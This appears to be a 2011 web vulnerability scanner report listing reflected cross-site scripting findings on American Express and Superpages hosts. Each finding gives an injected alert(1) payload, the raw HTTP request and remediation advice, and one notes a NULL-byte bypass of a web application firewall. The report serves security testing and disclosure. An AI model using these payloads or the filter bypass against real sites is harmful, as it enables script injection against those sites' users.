The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1
Host: www201.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 14:08:19 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com
Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/
Cache-Control: no-cache="set-cookie,set-cookie2"
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff3b0"-alert(1)-"0f9464b5bb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/print.cssff3b0"-alert(1)-"0f9464b5bb7 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49cd4"-alert(1)-"96eceb6ffe4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile49cd4"-alert(1)-"96eceb6ffe4/js/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b019f"-alert(1)-"5e23dbe0df5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsb019f"-alert(1)-"5e23dbe0df5/busprofile.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af28c"-alert(1)-"d5cdefab79b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/busprofile.jsaf28c"-alert(1)-"d5cdefab79b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edb86"-alert(1)-"af2b6080645 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileedb86"-alert(1)-"af2b6080645/js/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bae2"-alert(1)-"d1c4fd37467 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js1bae2"-alert(1)-"d1c4fd37467/csiframe.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd87"-alert(1)-"26871eafe34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/csiframe.js1dd87"-alert(1)-"26871eafe34 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3c75"-alert(1)-"933c529b5ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofileb3c75"-alert(1)-"933c529b5ba/js/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de57b"-alert(1)-"653154b748 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/jsde57b"-alert(1)-"653154b748/hide.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30f72"-alert(1)-"1d6df26e138 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/hide.js30f72"-alert(1)-"1d6df26e138 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f5f"-alert(1)-"a4339366c19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile41f5f"-alert(1)-"a4339366c19/js/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bda1"-alert(1)-"1e48a19052d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js9bda1"-alert(1)-"1e48a19052d/photos.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aa7"-alert(1)-"ad045aaf68e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/js/photos.js92aa7"-alert(1)-"ad045aaf68e HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50c0b"-alert(1)-"1189d0fb19e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile50c0b"-alert(1)-"1189d0fb19e/script.more.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 696df"-alert(1)-"ae58cd1d73c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/script.more.js696df"-alert(1)-"ae58cd1d73c HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e37"-alert(1)-"a77217be230 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common27e37"-alert(1)-"a77217be230/css/forms.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7342"-alert(1)-"107199becab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
